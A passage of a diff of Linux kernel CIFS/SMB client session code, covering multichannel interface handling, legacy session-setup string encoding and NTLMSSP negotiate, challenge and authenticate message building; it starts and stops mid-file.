++			}
++
++			cifs_dbg(FYI, "successfully opened new channel on iface:%pIS\n",
++				 &iface->sockaddr);
++			break;
++		}
++		spin_unlock(&ses->iface_lock);
++
++		left--;
++		new_chan_count++;
++	}
++
++	return new_chan_count - old_chan_count;
++}
++
++/*
++ * update the iface for the channel if necessary.
++ * will return 0 when iface is updated, 1 if removed, 2 otherwise
++ * Must be called with chan_lock held.
++ */
++int
++cifs_chan_update_iface(struct cifs_ses *ses, struct TCP_Server_Info *server)
++{
++	unsigned int chan_index;
++	struct cifs_server_iface *iface = NULL;
++	struct cifs_server_iface *old_iface = NULL;
++	int rc = 0;
++
++	spin_lock(&ses->chan_lock);
++	chan_index = cifs_ses_get_chan_index(ses, server);
++	if (!chan_index) {
++		spin_unlock(&ses->chan_lock);
++		return 0;
++	}
++
++	if (ses->chans[chan_index].iface) {
++		old_iface = ses->chans[chan_index].iface;
++		if (old_iface->is_active) {
++			spin_unlock(&ses->chan_lock);
++			return 1;
++		}
++	}
++	spin_unlock(&ses->chan_lock);
++
++	spin_lock(&ses->iface_lock);
++	/* then look for a new one */
++	list_for_each_entry(iface, &ses->iface_list, iface_head) {
++		if (!iface->is_active ||
++		    (is_ses_using_iface(ses, iface) &&
++		     !iface->rss_capable)) {
++			continue;
++		}
++		kref_get(&iface->refcount);
++		break;
++	}
++
++	if (list_entry_is_head(iface, &ses->iface_list, iface_head)) {
++		rc = 1;
++		iface = NULL;
++		cifs_dbg(FYI, "unable to find a suitable iface\n");
++	}
++
++	/* now drop the ref to the current iface */
++	if (old_iface && iface) {
++		cifs_dbg(FYI, "replacing iface: %pIS with %pIS\n",
++			 &old_iface->sockaddr,
++			 &iface->sockaddr);
++		kref_put(&old_iface->refcount, release_iface);
++	} else if (old_iface) {
++		cifs_dbg(FYI, "releasing ref to iface: %pIS\n",
++			 &old_iface->sockaddr);
++		kref_put(&old_iface->refcount, release_iface);
++	} else {
++		WARN_ON(!iface);
++		cifs_dbg(FYI, "adding new iface: %pIS\n", &iface->sockaddr);
++	}
++	spin_unlock(&ses->iface_lock);
++
++	spin_lock(&ses->chan_lock);
++	chan_index = cifs_ses_get_chan_index(ses, server);
++	ses->chans[chan_index].iface = iface;
++
++	/* No iface is found. if secondary chan, drop connection */
++	if (!iface && CIFS_SERVER_IS_CHAN(server))
++		ses->chans[chan_index].server = NULL;
++
++	spin_unlock(&ses->chan_lock);
++
++	if (!iface && CIFS_SERVER_IS_CHAN(server))
++		cifs_put_tcp_session(server, false);
++
++	return rc;
++}
++
++/*
++ * If server is a channel of ses, return the corresponding enclosing
++ * cifs_chan otherwise return NULL.
++ */
++struct cifs_chan *
++cifs_ses_find_chan(struct cifs_ses *ses, struct TCP_Server_Info *server)
++{
++	int i;
++
++	spin_lock(&ses->chan_lock);
++	for (i = 0; i < ses->chan_count; i++) {
++		if (ses->chans[i].server == server) {
++			spin_unlock(&ses->chan_lock);
++			return &ses->chans[i];
++		}
++	}
++	spin_unlock(&ses->chan_lock);
++	return NULL;
++}
++
++static int
++cifs_ses_add_channel(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses,
++		     struct cifs_server_iface *iface)
++{
++	struct TCP_Server_Info *chan_server;
++	struct cifs_chan *chan;
++	struct smb3_fs_context ctx = {NULL};
++	static const char unc_fmt[] = "\\%s\\foo";
++	char unc[sizeof(unc_fmt)+SERVER_NAME_LEN_WITH_NULL] = {0};
++	struct sockaddr_in *ipv4 = (struct sockaddr_in *)&iface->sockaddr;
++	struct sockaddr_in6 *ipv6 = (struct sockaddr_in6 *)&iface->sockaddr;
++	int rc;
++	unsigned int xid = get_xid();
++
++	if (iface->sockaddr.ss_family == AF_INET)
++		cifs_dbg(FYI, "adding channel to ses %p (speed:%zu bps rdma:%s ip:%pI4)\n",
++			 ses, iface->speed, iface->rdma_capable ? "yes" : "no",
++			 &ipv4->sin_addr);
++	else
++		cifs_dbg(FYI, "adding channel to ses %p (speed:%zu bps rdma:%s ip:%pI6)\n",
++			 ses, iface->speed, iface->rdma_capable ? "yes" : "no",
++			 &ipv6->sin6_addr);
++
++	/*
++	 * Setup a ctx with mostly the same info as the existing
++	 * session and overwrite it with the requested iface data.
++	 *
++	 * We need to setup at least the fields used for negprot and
++	 * sesssetup.
++	 *
++	 * We only need the ctx here, so we can reuse memory from
++	 * the session and server without caring about memory
++	 * management.
++	 */
++
++	/* Always make new connection for now (TODO?) */
++	ctx.nosharesock = true;
++
++	/* Auth */
++	ctx.domainauto = ses->domainAuto;
++	ctx.domainname = ses->domainName;
++
++	/* no hostname for extra channels */
++	ctx.server_hostname = "";
++
++	ctx.username = ses->user_name;
++	ctx.password = ses->password;
++	ctx.sectype = ses->sectype;
++	ctx.sign = ses->sign;
++
++	/* UNC and paths */
++	/* XXX: Use ses->server->hostname? */
++	sprintf(unc, unc_fmt, ses->ip_addr);
++	ctx.UNC = unc;
++	ctx.prepath = "";
++
++	/* Reuse same version as master connection */
++	ctx.vals = ses->server->vals;
++	ctx.ops = ses->server->ops;
++
++	ctx.noblocksnd = ses->server->noblocksnd;
++	ctx.noautotune = ses->server->noautotune;
++	ctx.sockopt_tcp_nodelay = ses->server->tcp_nodelay;
++	ctx.echo_interval = ses->server->echo_interval / HZ;
++	ctx.max_credits = ses->server->max_credits;
++
++	/*
++	 * This will be used for encoding/decoding user/domain/pw
++	 * during sess setup auth.
++	 */
++	ctx.local_nls = cifs_sb->local_nls;
++
++	/* Use RDMA if possible */
++	ctx.rdma = iface->rdma_capable;
++	memcpy(&ctx.dstaddr, &iface->sockaddr, sizeof(struct sockaddr_storage));
++
++	/* reuse master con client guid */
++	memcpy(&ctx.client_guid, ses->server->client_guid,
++	       SMB2_CLIENT_GUID_SIZE);
++	ctx.use_client_guid = true;
++
++	chan_server = cifs_get_tcp_session(&ctx, ses->server);
++
++	spin_lock(&ses->chan_lock);
++	chan = &ses->chans[ses->chan_count];
++	chan->server = chan_server;
++	if (IS_ERR(chan->server)) {
++		rc = PTR_ERR(chan->server);
++		chan->server = NULL;
++		spin_unlock(&ses->chan_lock);
++		goto out;
++	}
++	chan->iface = iface;
++	ses->chan_count++;
++	atomic_set(&ses->chan_seq, 0);
++
++	/* Mark this channel as needing connect/setup */
++	cifs_chan_set_need_reconnect(ses, chan->server);
++
++	spin_unlock(&ses->chan_lock);
++
++	mutex_lock(&ses->session_mutex);
++	/*
++	 * We need to allocate the server crypto now as we will need
++	 * to sign packets before we generate the channel signing key
++	 * (we sign with the session key)
++	 */
++	rc = smb311_crypto_shash_allocate(chan->server);
++	if (rc) {
++		cifs_dbg(VFS, "%s: crypto alloc failed\n", __func__);
++		mutex_unlock(&ses->session_mutex);
++		goto out;
++	}
++
++	rc = cifs_negotiate_protocol(xid, ses, chan->server);
++	if (!rc)
++		rc = cifs_setup_session(xid, ses, chan->server, cifs_sb->local_nls);
++
++	mutex_unlock(&ses->session_mutex);
++
++out:
++	if (rc && chan->server) {
++		/*
++		 * we should avoid race with these delayed works before we
++		 * remove this channel
++		 */
++		cancel_delayed_work_sync(&chan->server->echo);
++		cancel_delayed_work_sync(&chan->server->resolve);
++		cancel_delayed_work_sync(&chan->server->reconnect);
++
++		spin_lock(&ses->chan_lock);
++		/* we rely on all bits beyond chan_count to be clear */
++		cifs_chan_clear_need_reconnect(ses, chan->server);
++		ses->chan_count--;
++		/*
++		 * chan_count should never reach 0 as at least the primary
++		 * channel is always allocated
++		 */
++		WARN_ON(ses->chan_count < 1);
++		spin_unlock(&ses->chan_lock);
++
++		cifs_put_tcp_session(chan->server, 0);
++	}
++
++	free_xid(xid);
++	return rc;
++}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++static __u32 cifs_ssetup_hdr(struct cifs_ses *ses,
++			     struct TCP_Server_Info *server,
++			     SESSION_SETUP_ANDX *pSMB)
++{
++	__u32 capabilities = 0;
++
++	/* init fields common to all four types of SessSetup */
++	/* Note that offsets for first seven fields in req struct are same  */
++	/*	in CIFS Specs so does not matter which of 3 forms of struct */
++	/*	that we use in next few lines                               */
++	/* Note that header is initialized to zero in header_assemble */
++	pSMB->req.AndXCommand = 0xFF;
++	pSMB->req.MaxBufferSize = cpu_to_le16(min_t(u32,
++					CIFSMaxBufSize + MAX_CIFS_HDR_SIZE - 4,
++					USHRT_MAX));
++	pSMB->req.MaxMpxCount = cpu_to_le16(server->maxReq);
++	pSMB->req.VcNumber = cpu_to_le16(1);
++
++	/* Now no need to set SMBFLG_CASELESS or obsolete CANONICAL PATH */
++
++	/* BB verify whether signing required on neg or just on auth frame
++	   (and NTLM case) */
++
++	capabilities = CAP_LARGE_FILES | CAP_NT_SMBS | CAP_LEVEL_II_OPLOCKS |
++			CAP_LARGE_WRITE_X | CAP_LARGE_READ_X;
++
++	if (server->sign)
++		pSMB->req.hdr.Flags2 |= SMBFLG2_SECURITY_SIGNATURE;
++
++	if (ses->capabilities & CAP_UNICODE) {
++		pSMB->req.hdr.Flags2 |= SMBFLG2_UNICODE;
++		capabilities |= CAP_UNICODE;
++	}
++	if (ses->capabilities & CAP_STATUS32) {
++		pSMB->req.hdr.Flags2 |= SMBFLG2_ERR_STATUS;
++		capabilities |= CAP_STATUS32;
++	}
++	if (ses->capabilities & CAP_DFS) {
++		pSMB->req.hdr.Flags2 |= SMBFLG2_DFS;
++		capabilities |= CAP_DFS;
++	}
++	if (ses->capabilities & CAP_UNIX)
++		capabilities |= CAP_UNIX;
++
++	return capabilities;
++}
++
++static void
++unicode_oslm_strings(char **pbcc_area, const struct nls_table *nls_cp)
++{
++	char *bcc_ptr = *pbcc_area;
++	int bytes_ret = 0;
++
++	/* Copy OS version */
++	bytes_ret = cifs_strtoUTF16((__le16 *)bcc_ptr, "Linux version ", 32,
++				    nls_cp);
++	bcc_ptr += 2 * bytes_ret;
++	bytes_ret = cifs_strtoUTF16((__le16 *) bcc_ptr, init_utsname()->release,
++				    32, nls_cp);
++	bcc_ptr += 2 * bytes_ret;
++	bcc_ptr += 2; /* trailing null */
++
++	bytes_ret = cifs_strtoUTF16((__le16 *) bcc_ptr, CIFS_NETWORK_OPSYS,
++				    32, nls_cp);
++	bcc_ptr += 2 * bytes_ret;
++	bcc_ptr += 2; /* trailing null */
++
++	*pbcc_area = bcc_ptr;
++}
++
++static void unicode_domain_string(char **pbcc_area, struct cifs_ses *ses,
++				   const struct nls_table *nls_cp)
++{
++	char *bcc_ptr = *pbcc_area;
++	int bytes_ret = 0;
++
++	/* copy domain */
++	if (ses->domainName == NULL) {
++		/* Sending null domain better than using a bogus domain name (as
++		we did briefly in 2.6.18) since server will use its default */
++		*bcc_ptr = 0;
++		*(bcc_ptr+1) = 0;
++		bytes_ret = 0;
++	} else
++		bytes_ret = cifs_strtoUTF16((__le16 *) bcc_ptr, ses->domainName,
++					    CIFS_MAX_DOMAINNAME_LEN, nls_cp);
++	bcc_ptr += 2 * bytes_ret;
++	bcc_ptr += 2;  /* account for null terminator */
++
++	*pbcc_area = bcc_ptr;
++}
++
++static void unicode_ssetup_strings(char **pbcc_area, struct cifs_ses *ses,
++				   const struct nls_table *nls_cp)
++{
++	char *bcc_ptr = *pbcc_area;
++	int bytes_ret = 0;
++
++	/* BB FIXME add check that strings total less
++	than 335 or will need to send them as arrays */
++
++	/* copy user */
++	if (ses->user_name == NULL) {
++		/* null user mount */
++		*bcc_ptr = 0;
++		*(bcc_ptr+1) = 0;
++	} else {
++		bytes_ret = cifs_strtoUTF16((__le16 *) bcc_ptr, ses->user_name,
++					    CIFS_MAX_USERNAME_LEN, nls_cp);
++	}
++	bcc_ptr += 2 * bytes_ret;
++	bcc_ptr += 2; /* account for null termination */
++
++	unicode_domain_string(&bcc_ptr, ses, nls_cp);
++	unicode_oslm_strings(&bcc_ptr, nls_cp);
++
++	*pbcc_area = bcc_ptr;
++}
++
++static void ascii_ssetup_strings(char **pbcc_area, struct cifs_ses *ses,
++				 const struct nls_table *nls_cp)
++{
++	char *bcc_ptr = *pbcc_area;
++	int len;
++
++	/* copy user */
++	/* BB what about null user mounts - check that we do this BB */
++	/* copy user */
++	if (ses->user_name != NULL) {
++		len = strscpy(bcc_ptr, ses->user_name, CIFS_MAX_USERNAME_LEN);
++		if (WARN_ON_ONCE(len < 0))
++			len = CIFS_MAX_USERNAME_LEN - 1;
++		bcc_ptr += len;
++	}
++	/* else null user mount */
++	*bcc_ptr = 0;
++	bcc_ptr++; /* account for null termination */
++
++	/* copy domain */
++	if (ses->domainName != NULL) {
++		len = strscpy(bcc_ptr, ses->domainName, CIFS_MAX_DOMAINNAME_LEN);
++		if (WARN_ON_ONCE(len < 0))
++			len = CIFS_MAX_DOMAINNAME_LEN - 1;
++		bcc_ptr += len;
++	} /* else we will send a null domain name
++	     so the server will default to its own domain */
++	*bcc_ptr = 0;
++	bcc_ptr++;
++
++	/* BB check for overflow here */
++
++	strcpy(bcc_ptr, "Linux version ");
++	bcc_ptr += strlen("Linux version ");
++	strcpy(bcc_ptr, init_utsname()->release);
++	bcc_ptr += strlen(init_utsname()->release) + 1;
++
++	strcpy(bcc_ptr, CIFS_NETWORK_OPSYS);
++	bcc_ptr += strlen(CIFS_NETWORK_OPSYS) + 1;
++
++	*pbcc_area = bcc_ptr;
++}
++
++static void
++decode_unicode_ssetup(char **pbcc_area, int bleft, struct cifs_ses *ses,
++		      const struct nls_table *nls_cp)
++{
++	int len;
++	char *data = *pbcc_area;
++
++	cifs_dbg(FYI, "bleft %d\n", bleft);
++
++	kfree(ses->serverOS);
++	ses->serverOS = cifs_strndup_from_utf16(data, bleft, true, nls_cp);
++	cifs_dbg(FYI, "serverOS=%s\n", ses->serverOS);
++	len = (UniStrnlen((wchar_t *) data, bleft / 2) * 2) + 2;
++	data += len;
++	bleft -= len;
++	if (bleft <= 0)
++		return;
++
++	kfree(ses->serverNOS);
++	ses->serverNOS = cifs_strndup_from_utf16(data, bleft, true, nls_cp);
++	cifs_dbg(FYI, "serverNOS=%s\n", ses->serverNOS);
++	len = (UniStrnlen((wchar_t *) data, bleft / 2) * 2) + 2;
++	data += len;
++	bleft -= len;
++	if (bleft <= 0)
++		return;
++
++	kfree(ses->serverDomain);
++	ses->serverDomain = cifs_strndup_from_utf16(data, bleft, true, nls_cp);
++	cifs_dbg(FYI, "serverDomain=%s\n", ses->serverDomain);
++
++	return;
++}
++
++static void decode_ascii_ssetup(char **pbcc_area, __u16 bleft,
++				struct cifs_ses *ses,
++				const struct nls_table *nls_cp)
++{
++	int len;
++	char *bcc_ptr = *pbcc_area;
++
++	cifs_dbg(FYI, "decode sessetup ascii. bleft %d\n", bleft);
++
++	len = strnlen(bcc_ptr, bleft);
++	if (len >= bleft)
++		return;
++
++	kfree(ses->serverOS);
++
++	ses->serverOS = kmalloc(len + 1, GFP_KERNEL);
++	if (ses->serverOS) {
++		memcpy(ses->serverOS, bcc_ptr, len);
++		ses->serverOS[len] = 0;
++		if (strncmp(ses->serverOS, "OS/2", 4) == 0)
++			cifs_dbg(FYI, "OS/2 server\n");
++	}
++
++	bcc_ptr += len + 1;
++	bleft -= len + 1;
++
++	len = strnlen(bcc_ptr, bleft);
++	if (len >= bleft)
++		return;
++
++	kfree(ses->serverNOS);
++
++	ses->serverNOS = kmalloc(len + 1, GFP_KERNEL);
++	if (ses->serverNOS) {
++		memcpy(ses->serverNOS, bcc_ptr, len);
++		ses->serverNOS[len] = 0;
++	}
++
++	bcc_ptr += len + 1;
++	bleft -= len + 1;
++
++	len = strnlen(bcc_ptr, bleft);
++	if (len > bleft)
++		return;
++
++	/* No domain field in LANMAN case. Domain is
++	   returned by old servers in the SMB negprot response */
++	/* BB For newer servers which do not support Unicode,
++	   but thus do return domain here we could add parsing
++	   for it later, but it is not very important */
++	cifs_dbg(FYI, "ascii: bytes left %d\n", bleft);
++}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++int decode_ntlmssp_challenge(char *bcc_ptr, int blob_len,
++				    struct cifs_ses *ses)
++{
++	unsigned int tioffset; /* challenge message target info area */
++	unsigned int tilen; /* challenge message target info area length  */
++	CHALLENGE_MESSAGE *pblob = (CHALLENGE_MESSAGE *)bcc_ptr;
++	__u32 server_flags;
++
++	if (blob_len < sizeof(CHALLENGE_MESSAGE)) {
++		cifs_dbg(VFS, "challenge blob len %d too small\n", blob_len);
++		return -EINVAL;
++	}
++
++	if (memcmp(pblob->Signature, "NTLMSSP", 8)) {
++		cifs_dbg(VFS, "blob signature incorrect %s\n",
++			 pblob->Signature);
++		return -EINVAL;
++	}
++	if (pblob->MessageType != NtLmChallenge) {
++		cifs_dbg(VFS, "Incorrect message type %d\n",
++			 pblob->MessageType);
++		return -EINVAL;
++	}
++
++	server_flags = le32_to_cpu(pblob->NegotiateFlags);
++	cifs_dbg(FYI, "%s: negotiate=0x%08x challenge=0x%08x\n", __func__,
++		 ses->ntlmssp->client_flags, server_flags);
++
++	if ((ses->ntlmssp->client_flags & (NTLMSSP_NEGOTIATE_SEAL | NTLMSSP_NEGOTIATE_SIGN)) &&
++	    (!(server_flags & NTLMSSP_NEGOTIATE_56) && !(server_flags & NTLMSSP_NEGOTIATE_128))) {
++		cifs_dbg(VFS, "%s: requested signing/encryption but server did not return either 56-bit or 128-bit session key size\n",
++			 __func__);
++		return -EINVAL;
++	}
++	if (!(server_flags & NTLMSSP_NEGOTIATE_NTLM) && !(server_flags & NTLMSSP_NEGOTIATE_EXTENDED_SEC)) {
++		cifs_dbg(VFS, "%s: server does not seem to support either NTLMv1 or NTLMv2\n", __func__);
++		return -EINVAL;
++	}
++	if (ses->server->sign && !(server_flags & NTLMSSP_NEGOTIATE_SIGN)) {
++		cifs_dbg(VFS, "%s: forced packet signing but server does not seem to support it\n",
++			 __func__);
++		return -EOPNOTSUPP;
++	}
++	if ((ses->ntlmssp->client_flags & NTLMSSP_NEGOTIATE_KEY_XCH) &&
++	    !(server_flags & NTLMSSP_NEGOTIATE_KEY_XCH))
++		pr_warn_once("%s: authentication has been weakened as server does not support key exchange\n",
++			     __func__);
++
++	ses->ntlmssp->server_flags = server_flags;
++
++	memcpy(ses->ntlmssp->cryptkey, pblob->Challenge, CIFS_CRYPTO_KEY_SIZE);
++	/* In particular we can examine sign flags */
++	/* BB spec says that if AvId field of MsvAvTimestamp is populated then
++		we must set the MIC field of the AUTHENTICATE_MESSAGE */
++
++	tioffset = le32_to_cpu(pblob->TargetInfoArray.BufferOffset);
++	tilen = le16_to_cpu(pblob->TargetInfoArray.Length);
++	if (tioffset > blob_len || tioffset + tilen > blob_len) {
++		cifs_dbg(VFS, "tioffset + tilen too high %u + %u\n",
++			 tioffset, tilen);
++		return -EINVAL;
++	}
++	if (tilen) {
++		kfree_sensitive(ses->auth_key.response);
++		ses->auth_key.response = kmemdup(bcc_ptr + tioffset, tilen,
++						 GFP_KERNEL);
++		if (!ses->auth_key.response) {
++			cifs_dbg(VFS, "Challenge target info alloc failure\n");
++			return -ENOMEM;
++		}
++		ses->auth_key.len = tilen;
++	}
++
++	return 0;
++}
++
++static int size_of_ntlmssp_blob(struct cifs_ses *ses, int base_size)
++{
++	int sz = base_size + ses->auth_key.len
++		- CIFS_SESS_KEY_SIZE + CIFS_CPHTXT_SIZE + 2;
++
++	if (ses->domainName)
++		sz += sizeof(__le16) * strnlen(ses->domainName, CIFS_MAX_DOMAINNAME_LEN);
++	else
++		sz += sizeof(__le16);
++
++	if (ses->user_name)
++		sz += sizeof(__le16) * strnlen(ses->user_name, CIFS_MAX_USERNAME_LEN);
++	else
++		sz += sizeof(__le16);
++
++	if (ses->workstation_name[0])
++		sz += sizeof(__le16) * strnlen(ses->workstation_name,
++					       ntlmssp_workstation_name_size(ses));
++	else
++		sz += sizeof(__le16);
++
++	return sz;
++}
++
++static inline void cifs_security_buffer_from_str(SECURITY_BUFFER *pbuf,
++						 char *str_value,
++						 int str_length,
++						 unsigned char *pstart,
++						 unsigned char **pcur,
++						 const struct nls_table *nls_cp)
++{
++	unsigned char *tmp = pstart;
++	int len;
++
++	if (!pbuf)
++		return;
++
++	if (!pcur)
++		pcur = &tmp;
++
++	if (!str_value) {
++		pbuf->BufferOffset = cpu_to_le32(*pcur - pstart);
++		pbuf->Length = 0;
++		pbuf->MaximumLength = 0;
++		*pcur += sizeof(__le16);
++	} else {
++		len = cifs_strtoUTF16((__le16 *)*pcur,
++				      str_value,
++				      str_length,
++				      nls_cp);
++		len *= sizeof(__le16);
++		pbuf->BufferOffset = cpu_to_le32(*pcur - pstart);
++		pbuf->Length = cpu_to_le16(len);
++		pbuf->MaximumLength = cpu_to_le16(len);
++		*pcur += len;
++	}
++}
++
++/* BB Move to ntlmssp.c eventually */
++
++int build_ntlmssp_negotiate_blob(unsigned char **pbuffer,
++				 u16 *buflen,
++				 struct cifs_ses *ses,
++				 struct TCP_Server_Info *server,
++				 const struct nls_table *nls_cp)
++{
++	int rc = 0;
++	NEGOTIATE_MESSAGE *sec_blob;
++	__u32 flags;
++	unsigned char *tmp;
++	int len;
++
++	len = size_of_ntlmssp_blob(ses, sizeof(NEGOTIATE_MESSAGE));
++	*pbuffer = kmalloc(len, GFP_KERNEL);
++	if (!*pbuffer) {
++		rc = -ENOMEM;
++		cifs_dbg(VFS, "Error %d during NTLMSSP allocation\n", rc);
++		*buflen = 0;
++		goto setup_ntlm_neg_ret;
++	}
++	sec_blob = (NEGOTIATE_MESSAGE *)*pbuffer;
++
++	memset(*pbuffer, 0, sizeof(NEGOTIATE_MESSAGE));
++	memcpy(sec_blob->Signature, NTLMSSP_SIGNATURE, 8);
++	sec_blob->MessageType = NtLmNegotiate;
++
++	/* BB is NTLMV2 session security format easier to use here? */
++	flags = NTLMSSP_NEGOTIATE_56 |	NTLMSSP_REQUEST_TARGET |
++		NTLMSSP_NEGOTIATE_128 | NTLMSSP_NEGOTIATE_UNICODE |
++		NTLMSSP_NEGOTIATE_NTLM | NTLMSSP_NEGOTIATE_EXTENDED_SEC |
++		NTLMSSP_NEGOTIATE_ALWAYS_SIGN | NTLMSSP_NEGOTIATE_SEAL |
++		NTLMSSP_NEGOTIATE_SIGN;
++	if (!server->session_estab || ses->ntlmssp->sesskey_per_smbsess)
++		flags |= NTLMSSP_NEGOTIATE_KEY_XCH;
++
++	tmp = *pbuffer + sizeof(NEGOTIATE_MESSAGE);
++	ses->ntlmssp->client_flags = flags;
++	sec_blob->NegotiateFlags = cpu_to_le32(flags);
++
++	/* these fields should be null in negotiate phase MS-NLMP 3.1.5.1.1 */
++	cifs_security_buffer_from_str(&sec_blob->DomainName,
++				      NULL,
++				      CIFS_MAX_DOMAINNAME_LEN,
++				      *pbuffer, &tmp,
++				      nls_cp);
++
++	cifs_security_buffer_from_str(&sec_blob->WorkstationName,
++				      NULL,
++				      CIFS_MAX_WORKSTATION_LEN,
++				      *pbuffer, &tmp,
++				      nls_cp);
++
++	*buflen = tmp - *pbuffer;
++setup_ntlm_neg_ret:
++	return rc;
++}
++
++/*
++ * Build ntlmssp blob with additional fields, such as version,
++ * supported by modern servers. For safety limit to SMB3 or later
++ * See notes in MS-NLMP Section 2.2.2.1 e.g.
++ */
++int build_ntlmssp_smb3_negotiate_blob(unsigned char **pbuffer,
++				 u16 *buflen,
++				 struct cifs_ses *ses,
++				 struct TCP_Server_Info *server,
++				 const struct nls_table *nls_cp)
++{
++	int rc = 0;
++	struct negotiate_message *sec_blob;
++	__u32 flags;
++	unsigned char *tmp;
++	int len;
++
++	len = size_of_ntlmssp_blob(ses, sizeof(struct negotiate_message));
++	*pbuffer = kmalloc(len, GFP_KERNEL);
++	if (!*pbuffer) {
++		rc = -ENOMEM;
++		cifs_dbg(VFS, "Error %d during NTLMSSP allocation\n", rc);
++		*buflen = 0;
++		goto setup_ntlm_smb3_neg_ret;
++	}
++	sec_blob = (struct negotiate_message *)*pbuffer;
++
++	memset(*pbuffer, 0, sizeof(struct negotiate_message));
++	memcpy(sec_blob->Signature, NTLMSSP_SIGNATURE, 8);
++	sec_blob->MessageType = NtLmNegotiate;
++
++	/* BB is NTLMV2 session security format easier to use here? */
++	flags = NTLMSSP_NEGOTIATE_56 |	NTLMSSP_REQUEST_TARGET |
++		NTLMSSP_NEGOTIATE_128 | NTLMSSP_NEGOTIATE_UNICODE |
++		NTLMSSP_NEGOTIATE_NTLM | NTLMSSP_NEGOTIATE_EXTENDED_SEC |
++		NTLMSSP_NEGOTIATE_ALWAYS_SIGN | NTLMSSP_NEGOTIATE_SEAL |
++		NTLMSSP_NEGOTIATE_SIGN | NTLMSSP_NEGOTIATE_VERSION;
++	if (!server->session_estab || ses->ntlmssp->sesskey_per_smbsess)
++		flags |= NTLMSSP_NEGOTIATE_KEY_XCH;
++
++	sec_blob->Version.ProductMajorVersion = LINUX_VERSION_MAJOR;
++	sec_blob->Version.ProductMinorVersion = LINUX_VERSION_PATCHLEVEL;
++	sec_blob->Version.ProductBuild = cpu_to_le16(SMB3_PRODUCT_BUILD);
++	sec_blob->Version.NTLMRevisionCurrent = NTLMSSP_REVISION_W2K3;
++
++	tmp = *pbuffer + sizeof(struct negotiate_message);
++	ses->ntlmssp->client_flags = flags;
++	sec_blob->NegotiateFlags = cpu_to_le32(flags);
++
++	/* these fields should be null in negotiate phase MS-NLMP 3.1.5.1.1 */
++	cifs_security_buffer_from_str(&sec_blob->DomainName,
++				      NULL,
++				      CIFS_MAX_DOMAINNAME_LEN,
++				      *pbuffer, &tmp,
++				      nls_cp);
++
++	cifs_security_buffer_from_str(&sec_blob->WorkstationName,
++				      NULL,
++				      CIFS_MAX_WORKSTATION_LEN,
++				      *pbuffer, &tmp,
++				      nls_cp);
++
++	*buflen = tmp - *pbuffer;
++setup_ntlm_smb3_neg_ret:
++	return rc;
++}
++
++
++int build_ntlmssp_auth_blob(unsigned char **pbuffer,
++					u16 *buflen,
++				   struct cifs_ses *ses,
++				   struct TCP_Server_Info *server,
++				   const struct nls_table *nls_cp)
++{
++	int rc;
++	AUTHENTICATE_MESSAGE *sec_blob;
++	__u32 flags;
++	unsigned char *tmp;
++	int len;
++
++	rc = setup_ntlmv2_rsp(ses, nls_cp);
++	if (rc) {
++		cifs_dbg(VFS, "Error %d during NTLMSSP authentication\n", rc);
++		*buflen = 0;
++		goto setup_ntlmv2_ret;
++	}
++
++	len = size_of_ntlmssp_blob(ses, sizeof(AUTHENTICATE_MESSAGE));
++	*pbuffer = kmalloc(len, GFP_KERNEL);
++	if (!*pbuffer) {
++		rc = -ENOMEM;
++		cifs_dbg(VFS, "Error %d during NTLMSSP allocation\n", rc);
++		*buflen = 0;
++		goto setup_ntlmv2_ret;
++	}
++	sec_blob = (AUTHENTICATE_MESSAGE *)*pbuffer;
++
++	memcpy(sec_blob->Signature, NTLMSSP_SIGNATURE, 8);
++	sec_blob->MessageType = NtLmAuthenticate;
++
++	flags = ses->ntlmssp->server_flags | NTLMSSP_REQUEST_TARGET |
++		NTLMSSP_NEGOTIATE_TARGET_INFO | NTLMSSP_NEGOTIATE_WORKSTATION_SUPPLIED;
++
++	tmp = *pbuffer + sizeof(AUTHENTICATE_MESSAGE);
++	sec_blob->NegotiateFlags = cpu_to_le32(flags);
++
++	sec_blob->LmChallengeResponse.BufferOffset =
++				cpu_to_le32(sizeof(AUTHENTICATE_MESSAGE));
++	sec_blob->LmChallengeResponse.Length = 0;
++	sec_blob->LmChallengeResponse.MaximumLength = 0;
++
++	sec_blob->NtChallengeResponse.BufferOffset =
++				cpu_to_le32(tmp - *pbuffer);
++	if (ses->user_name != NULL) {
++		memcpy(tmp, ses->auth_key.response + CIFS_SESS_KEY_SIZE,
++				ses->auth_key.len - CIFS_SESS_KEY_SIZE);
++		tmp += ses->auth_key.len - CIFS_SESS_KEY_SIZE;
++
++		sec_blob->NtChallengeResponse.Length =
++				cpu_to_le16(ses->auth_key.len - CIFS_SESS_KEY_SIZE);
++		sec_blob->NtChallengeResponse.MaximumLength =
++				cpu_to_le16(ses->auth_key.len - CIFS_SESS_KEY_SIZE);
++	} else {
++		/*
++		 * don't send an NT Response for anonymous access
++		 */
++		sec_blob->NtChallengeResponse.Length = 0;
++		sec_blob->NtChallengeResponse.MaximumLength = 0;
++	}
++
++	cifs_security_buffer_from_str(&sec_blob->DomainName,
++				      ses->domainName,
++				      CIFS_MAX_DOMAINNAME_LEN,
++				      *pbuffer, &tmp,
++				      nls_cp);
++
++	cifs_security_buffer_from_str(&sec_blob->UserName,
++				      ses->user_name,
++				      CIFS_MAX_USERNAME_LEN,
++				      *pbuffer, &tmp,
++				      nls_cp);
++
++	cifs_security_buffer_from_str(&sec_blob->WorkstationName,
++				      ses->workstation_name,
++				      ntlmssp_workstation_name_size(ses),
++				      *pbuffer, &tmp,
++				      nls_cp);
++
++	if ((ses->ntlmssp->server_flags & NTLMSSP_NEGOTIATE_KEY_XCH) &&
++	    (!ses->server->session_estab || ses->ntlmssp->sesskey_per_smbsess) &&
++	    !calc_seckey(ses)) {
++		memcpy(tmp, ses->ntlmssp->ciphertext, CIFS_CPHTXT_SIZE);
++		sec_blob->SessionKey.BufferOffset = cpu_to_le32(tmp - *pbuffer);
++		sec_blob->SessionKey.Length = cpu_to_le16(CIFS_CPHTXT_SIZE);
++		sec_blob->SessionKey.MaximumLength =
++				cpu_to_le16(CIFS_CPHTXT_SIZE);
++		tmp += CIFS_CPHTXT_SIZE;
++	} else {
++		sec_blob->SessionKey.BufferOffset = cpu_to_le32(tmp - *pbuffer);
++		sec_blob->SessionKey.Length = 0;
++		sec_blob->SessionKey.MaximumLength = 0;
++	}
++
++	*buflen = tmp - *pbuffer;
++setup_ntlmv2_ret:
++	return rc;
++}
++
++enum securityEnum
++cifs_select_sectype(struct TCP_Server_Info *server, enum securityEnum requested)
++{
++	switch (server->negflavor) {
